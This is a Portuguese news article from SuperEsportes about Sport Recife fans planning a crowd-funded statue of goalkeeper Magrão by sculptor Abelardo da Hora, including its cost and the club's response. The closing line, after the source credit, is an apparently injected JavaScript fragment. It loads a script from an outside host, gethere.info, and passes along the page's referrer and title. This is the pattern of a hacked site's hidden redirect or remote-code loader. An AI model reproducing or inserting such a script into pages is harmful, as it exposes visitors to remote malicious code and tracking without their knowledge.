Your ads will be inserted here by
Easy Plugin for AdSense.
Please go to the plugin admin page to
Paste your ad code OR
Suppress this ad slot.
Começou com uma ideia discutida em sites de relacionamento, mas pode terminar como uma homenagem ao maior ídolo da torcida do Sport na atualidade. O desejo de eternizar o goleiro Magrão com uma estátua na Ilha do Retiro deu um passo em direção à concretização.
Ontem, torcedores do time entraram em contato com o artista plástico pernambucano Abelardo da Hora, que topou o desafio. Informado pelo Superesportes, Gustavo Dubeux, favorito para assumir o clube após a eleição, disse que a homenagem seria muito bem recebida em sua gestão.
O problema é o custo. A ideia dos torcedores é a abertura de uma conta-corrente para que os interessados possam depositar a quantia que quiserem. O valor estimado da obra é de até R$ 250 mil.
Uma das torcedoras envolvidas no processo é a consultora de seguros Ione Maria. Depois de participar dos tópicos na comunidade do time no Orkut, Ione decidiu agir e entrou em contato com Abelardo. ´A ideia é fazer uma estátua de 1,87m – altura do goleiro -, para mostrar como estamos agradecidospor tudo o que Magrão tem feito pelo Sport`, esclareceu Ione. ´Não pode ser um busto, simplesmente. Magrão virou ídolo pelas defesas espetaculares e é assim que ele deveria ser lembrado`, contou.
A rubro-negra acrescentou ainda que a maior parte dos frequentadores da comunidade acha que a defesa de Magrão no segundo tempo do jogo contra o Colo-Colo, pela Libertadores, garantindo a vitória rubro-negra no Chile, seria a pose ideal. Apesar de, plasticamente, não ser tão bonita, Magrão já declarou que a defesa mais difícil (e, por que não, mais importante?) que ele já fez foi na final da Copa do Brasil de 2008, num chute do meia Lulinha, nos últimos minutos da partida.
Sobre o desafio, Abelardo da Hora disse que será um prazer fazer uma estátua daquele que ele considera o maior goleiro do Brasil. ´Vou analisar algumas fotos para fazer os estudos da atitude, da fisionomia e da expressão. Depois, gostaria que ele posasse para mim`, destacou o artista, que acredita que finaliza a obra em três meses. Depois de ressaltar que a homenagem é mais do que justa, Gustavo Dubeux, favorito para assumir o clube, acrescentou que o Sport não tem condições para arcar com a despesa. ´Magrão merece todo o reconhecimento da torcida e da diretoria, mas o clube vive um momento financeiro difícil`, justificou.
Fonte: SuperEsportes
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;